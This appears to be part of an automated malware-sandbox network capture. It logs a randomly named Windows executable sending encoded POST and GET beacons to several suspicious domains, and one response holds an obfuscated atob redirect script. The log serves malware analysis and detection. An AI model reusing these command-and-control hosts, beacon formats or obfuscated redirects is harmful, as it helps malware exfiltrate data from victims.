                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.2.849733154.88.22.105805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:45:06.998460054 CET515OUTGET /n6mr/?t8=erepa0aHg&dpy4vDKP=GPIQ2z/B9X5fmZ3sRaU3lKIswCsVIIIgTgvk25ZssZv4dO1E/pYASyJvrlPo9cI5+by0L1E1CSBOcK+TEfCDQZVXcl76FOzKxgwJ6LhevK7HHB5B6PysFKjeMQUdEOWzug== HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.cg19g5.pro
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:45:08.518945932 CET332INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:45:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Data Raw: 34 65 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 39 69 59 6a 4a 6c 4c 6d 4e 6e 4d 57 35 76 4e 53 35 77 63 6d 38 36 4e 6a 59 34 4f 51 3d 0d 0a 63 0d 0a 3d 27 29 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 4e<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly9iYjJlLmNnMW5vNS5wcm86NjY4OQ=c=')</script>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.2.84973485.159.66.93805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:45:14.655365944 CET783OUTPOST /0y4f/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.kuyubak.online
                                                                    Origin: http://www.kuyubak.online
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.kuyubak.online/0y4f/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 62 34 4c 58 47 53 33 69 6f 37 78 68 32 56 2f 31 6b 68 59 66 32 65 63 45 4e 4f 57 4d 39 61 52 62 72 6c 45 6e 68 46 78 36 53 6c 74 2b 49 43 6c 5a 71 6e 69 36 44 53 68 76 31 30 48 69 41 33 4c 61 57 38 70 71 61 76 2f 77 33 4c 75 34 69 45 46 62 43 6f 6e 37 31 41 4f 34 51 6d 33 53 48 73 72 76 38 65 70 4a 65 57 4a 52 31 67 62 69 43 52 6e 54 57 52 71 39 2f 6e 6b 42 70 7a 57 6a 43 47 4c 70 71 6d 50 55 41 52 72 44 34 41 46 7a 6d 74 30 6c 74 2b 54 42 74 72 7a 64 63 35 4c 30 73 46 72 43 32 54 6c 75 4f 6f 79 6f 43 44 38 58 73 5a 67 52 72 34 70 63 41 50 7a 44 42 4b 47 79 35 71 31 6a 39 39 55 45 55 66 49 3d
                                                                    Data Ascii: dpy4vDKP=b4LXGS3io7xh2V/1khYf2ecENOWM9aRbrlEnhFx6Slt+IClZqni6DShv10HiA3LaW8pqav/w3Lu4iEFbCon71AO4Qm3SHsrv8epJeWJR1gbiCRnTWRq9/nkBpzWjCGLpqmPUARrD4AFzmt0lt+TBtrzdc5L0sFrC2TluOoyoCD8XsZgRr4pcAPzDBKGy5q1j99UEUfI=


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.84973585.159.66.93805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:45:17.318989038 CET803OUTPOST /0y4f/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.kuyubak.online
                                                                    Origin: http://www.kuyubak.online
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.kuyubak.online/0y4f/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 62 34 4c 58 47 53 33 69 6f 37 78 68 33 77 76 31 69 47 4d 66 78 2b 63 44 43 75 57 4d 6b 71 52 66 72 69 4d 6e 68 48 64 71 52 58 4a 2b 49 6a 56 5a 72 6d 69 36 54 43 68 76 74 6b 48 6e 4f 58 4c 42 57 38 6b 66 61 71 48 77 33 4c 36 34 69 42 35 62 43 37 66 34 31 51 4f 36 63 47 33 51 4e 4d 72 76 38 65 70 4a 65 53 5a 33 31 6a 72 69 44 67 33 54 58 7a 43 69 6a 33 6b 43 68 54 57 6a 47 47 4c 6c 71 6d 50 4d 41 51 32 57 34 43 39 7a 6d 73 45 6c 74 72 76 47 30 62 7a 62 53 5a 4b 49 6e 52 6d 61 38 7a 64 51 4b 4f 6d 56 43 68 30 49 67 50 52 37 78 61 68 61 44 50 62 6f 42 4a 75 45 38 64 6f 4c 6e 65 45 30 4b 49 63 45 6e 42 56 79 64 64 58 70 70 6d 65 37 70 74 63 42 76 4b 4b 72
                                                                    Data Ascii: dpy4vDKP=b4LXGS3io7xh3wv1iGMfx+cDCuWMkqRfriMnhHdqRXJ+IjVZrmi6TChvtkHnOXLBW8kfaqHw3L64iB5bC7f41QO6cG3QNMrv8epJeSZ31jriDg3TXzCij3kChTWjGGLlqmPMAQ2W4C9zmsEltrvG0bzbSZKInRma8zdQKOmVCh0IgPR7xahaDPboBJuE8doLneE0KIcEnBVyddXppme7ptcBvKKr


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.2.84973685.159.66.93805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:45:19.979989052 CET1820OUTPOST /0y4f/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.kuyubak.online
                                                                    Origin: http://www.kuyubak.online
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.kuyubak.online/0y4f/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 62 34 4c 58 47 53 33 69 6f 37 78 68 33 77 76 31 69 47 4d 66 78 2b 63 44 43 75 57 4d 6b 71 52 66 72 69 4d 6e 68 48 64 71 52 58 42 2b 4a 52 74 5a 71 46 36 36 42 53 68 76 6c 45 48 63 4f 58 4b 42 57 38 4d 62 61 71 44 4f 33 4a 43 34 67 6b 31 62 56 61 66 34 36 51 4f 36 55 6d 33 52 48 73 71 72 38 59 4a 53 65 57 46 33 31 6a 72 69 44 69 66 54 51 68 71 69 68 33 6b 42 70 7a 57 76 43 47 4c 42 71 6d 58 32 41 51 7a 74 34 7a 64 7a 6c 4d 55 6c 2b 4e 37 47 72 72 7a 5a 48 5a 4b 51 6e 57 75 37 38 7a 78 63 4b 4f 36 37 43 69 55 49 6a 70 55 57 76 49 39 52 63 50 7a 43 50 37 43 78 34 74 30 59 36 59 45 65 41 70 51 38 6d 56 77 66 66 4f 62 62 67 57 6a 73 39 34 6b 79 6d 73 44 31 74 47 6c 56 36 38 63 6a 57 7a 39 43 57 31 67 58 2b 41 6c 6e 58 6b 61 32 30 54 44 43 52 36 53 57 45 6b 54 2b 65 72 4b 58 4c 39 67 70 71 57 4d 77 4c 36 53 6d 71 34 74 6e 6c 54 77 70 6f 46 63 6b 75 39 39 34 46 57 42 7a 7a 6c 76 61 6b 6a 54 39 43 4d 62 56 45 6c 52 46 69 6c 6b 62 4c 49 52 4b 78 43 30 33 72 42 30 43 4a 4b 72 65 64 [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP=b4LXGS3io7xh3wv1iGMfx+cDCuWMkqRfriMnhHdqRXB+JRtZqF66BShvlEHcOXKBW8MbaqDO3JC4gk1bVaf46QO6Um3RHsqr8YJSeWF31jriDifTQhqih3kBpzWvCGLBqmX2AQzt4zdzlMUl+N7GrrzZHZKQnWu78zxcKO67CiUIjpUWvI9RcPzCP7Cx4t0Y6YEeApQ8mVwffObbgWjs94kymsD1tGlV68cjWz9CW1gX+AlnXka20TDCR6SWEkT+erKXL9gpqWMwL6Smq4tnlTwpoFcku994FWBzzlvakjT9CMbVElRFilkbLIRKxC03rB0CJKred+A1EPTfkQjNXcw2LOeOP7JJqMHOvqqfpc/lFiSqxs9DqXruu8BzW5Po4Box5IwPy16FEhOpsCG6RdfROLlCCsfysIH47ycykvvbMwXd8WHqb5fY4234EZ4XyGX8kt9RrHBEy9JDT3EJl50Gt+g27VbWhTXdgYEHGDiOu39G1P3pym6luVrVe6Pq6jz7yR/T98hUgCiNyUfTfy4vHwSZxP16DdkFpJ0MICH+Lusk9wqp/ifEJdDK6USzyT7x9E5EyuItCJigxubhVKFA6Dzi4kEOU7+/9nLLNoxMSdE8ieBnOtn0o6HCje393cVGXs10Oc7tjxkAUE+cPlRJlv16AjAs6oHr4Xv7NNU7/krSNnqgKrBcOq8zUwCHZ5KvqVn0hsdaGeBY5iVGB4+7tDU8yauFPYPbXbNdY0WH6Q9wtOcSOQKojJxYIl+tIDFbowO3K0JFVVTuYyDCdAqNc92rSkn1jJ3R58g15/YEWPKEvtfwg8dAFebR/8hTJZn3m/69MIM4knuWyv+N92jYja/CR8KkSeNhw+uDGpAuJRpiyT/HBO0J57EZdO2Z3apBVdggssh4LeVxmOnRC9EPn+xVwZttwtwXeyNEXFOJQYQE70ZuMawIbHBv2XvGCUo0xaJCaOI5gZ9i+hgCG076qr2Yh5FKCXSbkh9LoU2 [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.84973785.159.66.93805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:45:22.643873930 CET519OUTGET /0y4f/?dpy4vDKP=W6j3FlXHgKFEzHHMzzUr6etYN8emjbRukUVUnXhTbXIwJxcnvHf7UERkoV23CGr7af9sT9Hr2IGU+EAvarnr8GKkbF3NBPjLy540YzR1+jWjLh+mVAm2mD8qugDIDXe/9Q==&t8=erepa0aHg HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.kuyubak.online
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:45:23.959758997 CET225INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.14.1
                                                                    Date: Thu, 05 Dec 2024 08:45:23 GMT
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    X-Rate-Limit-Limit: 5s
                                                                    X-Rate-Limit-Remaining: 19
                                                                    X-Rate-Limit-Reset: 2024-12-05T08:45:28.7410353Z


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.2.849738199.59.243.227805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:45:29.832551956 CET795OUTPOST /9qaj/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.acond-22-mvr.click
                                                                    Origin: http://www.acond-22-mvr.click
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.acond-22-mvr.click/9qaj/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 52 59 74 59 48 72 32 52 44 78 67 32 74 7a 57 6b 53 6b 75 74 4e 55 6a 59 6b 36 75 53 61 73 48 6f 51 49 52 6b 74 78 72 38 59 59 48 41 31 79 35 39 72 4c 69 70 2f 35 41 4c 6f 64 51 4b 4b 4c 50 30 6c 69 2b 76 73 37 2f 43 31 4e 6a 73 39 6c 6d 58 4a 69 48 47 77 75 67 53 31 76 62 48 31 6d 73 58 4c 30 79 57 56 46 6b 77 58 6d 6d 2f 32 6c 66 6d 6b 34 42 32 61 6a 37 6b 71 74 4d 32 53 71 6e 32 6a 49 78 6b 43 6a 41 62 63 6f 7a 35 4a 37 62 71 47 4e 2f 61 6f 4f 2b 67 55 64 69 4e 73 35 43 74 52 55 72 78 67 45 32 34 78 65 30 43 71 6b 36 59 75 68 35 62 66 2f 67 6a 38 45 64 76 36 33 38 6a 6d 50 56 53 46 52 49 3d
                                                                    Data Ascii: dpy4vDKP=RYtYHr2RDxg2tzWkSkutNUjYk6uSasHoQIRktxr8YYHA1y59rLip/5ALodQKKLP0li+vs7/C1Njs9lmXJiHGwugS1vbH1msXL0yWVFkwXmm/2lfmk4B2aj7kqtM2Sqn2jIxkCjAbcoz5J7bqGN/aoO+gUdiNs5CtRUrxgE24xe0Cqk6Yuh5bf/gj8Edv638jmPVSFRI=
                                                                    Dec 5, 2024 09:45:30.910343885 CET1236INHTTP/1.1 200 OK
                                                                    date: Thu, 05 Dec 2024 08:45:30 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1138
                                                                    x-request-id: ee200165-15c0-4ea5-9132-e5829c91bac1
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IW9WvAB1qfFDPre95lKUHpblrUqctL2bDiYmlMm6sfikY2QV8UJvEPi3D3VXyUN0Khk6g1Yd3zf+zCJ68RDHOw==
                                                                    set-cookie: parking_session=ee200165-15c0-4ea5-9132-e5829c91bac1; expires=Thu, 05 Dec 2024 09:00:30 GMT; path=/
                                                                    connection: close
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 49 57 39 57 76 41 42 31 71 66 46 44 50 72 65 39 35 6c 4b 55 48 70 62 6c 72 55 71 63 74 4c 32 62 44 69 59 6d 6c 4d 6d 36 73 66 69 6b 59 32 51 56 38 55 4a 76 45 50 69 33 44 33 56 58 79 55 4e 30 4b 68 6b 36 67 31 59 64 33 7a 66 2b 7a 43 4a 36 38 52 44 48 4f 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IW9WvAB1qfFDPre95lKUHpblrUqctL2bDiYmlMm6sfikY2QV8UJvEPi3D3VXyUN0Khk6g1Yd3zf+zCJ68RDHOw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                    Dec 5, 2024 09:45:30.910367012 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZWUyMDAxNjUtMTVjMC00ZWE1LTkxMzItZTU4MjljOTFiYWMxIiwicGFnZV90aW1lIjoxNzMzMzg4Mz


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    30192.168.2.849739199.59.243.227805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:45:32.496433020 CET815OUTPOST /9qaj/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.acond-22-mvr.click
                                                                    Origin: http://www.acond-22-mvr.click
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.acond-22-mvr.click/9qaj/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 52 59 74 59 48 72 32 52 44 78 67 32 75 54 47 6b 51 44 43 74 49 30 6a 62 68 36 75 53 54 4d 48 73 51 49 56 6b 74 30 54 57 59 71 54 41 73 53 4a 39 71 4a 61 70 2b 35 41 4c 6e 39 51 31 4f 4c 50 76 6c 69 79 4e 73 2b 2f 43 31 4a 44 73 39 6c 57 58 4a 7a 48 48 78 2b 67 55 67 66 62 4a 36 47 73 58 4c 30 79 57 56 46 5a 6e 58 67 4f 2f 32 30 76 6d 72 35 42 78 53 44 37 6e 38 39 4d 32 44 36 6e 49 6a 49 77 4c 43 69 63 39 63 73 44 35 4a 37 72 71 49 38 2f 5a 2f 65 2f 72 51 64 6a 46 2f 36 6a 31 52 6d 58 6b 6b 58 53 66 2f 50 59 42 76 53 4c 79 30 44 78 64 63 2f 49 49 38 48 31 5a 2f 41 68 4c 38 73 46 69 62 47 65 77 43 75 52 46 39 31 6a 47 68 4b 36 69 50 38 53 33 2b 50 64 66
                                                                    Data Ascii: dpy4vDKP=RYtYHr2RDxg2uTGkQDCtI0jbh6uSTMHsQIVkt0TWYqTAsSJ9qJap+5ALn9Q1OLPvliyNs+/C1JDs9lWXJzHHx+gUgfbJ6GsXL0yWVFZnXgO/20vmr5BxSD7n89M2D6nIjIwLCic9csD5J7rqI8/Z/e/rQdjF/6j1RmXkkXSf/PYBvSLy0Dxdc/II8H1Z/AhL8sFibGewCuRF91jGhK6iP8S3+Pdf
                                                                    Dec 5, 2024 09:45:33.572592974 CET1236INHTTP/1.1 200 OK
                                                                    date: Thu, 05 Dec 2024 08:45:33 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1138
                                                                    x-request-id: c6bd7d92-3e31-42f7-8388-b1e8c8d2c578
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IW9WvAB1qfFDPre95lKUHpblrUqctL2bDiYmlMm6sfikY2QV8UJvEPi3D3VXyUN0Khk6g1Yd3zf+zCJ68RDHOw==
                                                                    set-cookie: parking_session=c6bd7d92-3e31-42f7-8388-b1e8c8d2c578; expires=Thu, 05 Dec 2024 09:00:33 GMT; path=/
                                                                    connection: close
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 49 57 39 57 76 41 42 31 71 66 46 44 50 72 65 39 35 6c 4b 55 48 70 62 6c 72 55 71 63 74 4c 32 62 44 69 59 6d 6c 4d 6d 36 73 66 69 6b 59 32 51 56 38 55 4a 76 45 50 69 33 44 33 56 58 79 55 4e 30 4b 68 6b 36 67 31 59 64 33 7a 66 2b 7a 43 4a 36 38 52 44 48 4f 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IW9WvAB1qfFDPre95lKUHpblrUqctL2bDiYmlMm6sfikY2QV8UJvEPi3D3VXyUN0Khk6g1Yd3zf+zCJ68RDHOw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                    Dec 5, 2024 09:45:33.572798014 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzZiZDdkOTItM2UzMS00MmY3LTgzODgtYjFlOGM4ZDJjNTc4IiwicGFnZV90aW1lIjoxNzMzMzg4Mz


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    31192.168.2.849740199.59.243.227805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:45:35.166600943 CET1832OUTPOST /9qaj/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.acond-22-mvr.click
                                                                    Origin: http://www.acond-22-mvr.click
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.acond-22-mvr.click/9qaj/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 52 59 74 59 48 72 32 52 44 78 67 32 75 54 47 6b 51 44 43 74 49 30 6a 62 68 36 75 53 54 4d 48 73 51 49 56 6b 74 30 54 57 59 71 4c 41 77 78 42 39 72 6f 61 70 34 4a 41 4c 35 74 51 4f 4f 4c 4f 31 6c 69 71 4a 73 2b 37 4e 31 50 50 73 39 48 65 58 59 58 62 48 37 2b 67 55 2f 50 62 45 31 6d 73 34 4c 79 53 53 56 46 70 6e 58 67 4f 2f 32 33 6e 6d 76 6f 42 78 55 44 37 6b 71 74 4d 79 53 71 6d 6c 6a 4d 6c 38 43 69 70 47 63 64 2f 35 4a 62 37 71 4b 4f 48 5a 67 75 2f 70 58 64 6a 30 2f 36 76 55 52 6d 4b 4b 6b 57 32 6c 2f 4d 49 42 73 54 71 50 78 54 73 48 42 73 41 4c 30 67 39 47 33 33 42 58 35 73 68 42 48 48 6a 52 4e 5a 6c 6b 2f 32 54 65 70 4e 69 70 59 5a 71 6d 76 4a 73 75 53 4a 62 71 67 55 41 5a 64 6d 6d 4a 58 6f 63 4a 41 32 42 36 70 6c 2b 45 65 59 58 58 56 63 42 4f 4a 51 49 77 6e 52 75 4c 63 41 4e 6d 78 73 30 73 38 59 77 47 2b 67 6c 34 43 41 34 37 68 38 4d 53 79 32 2b 74 75 61 30 6f 73 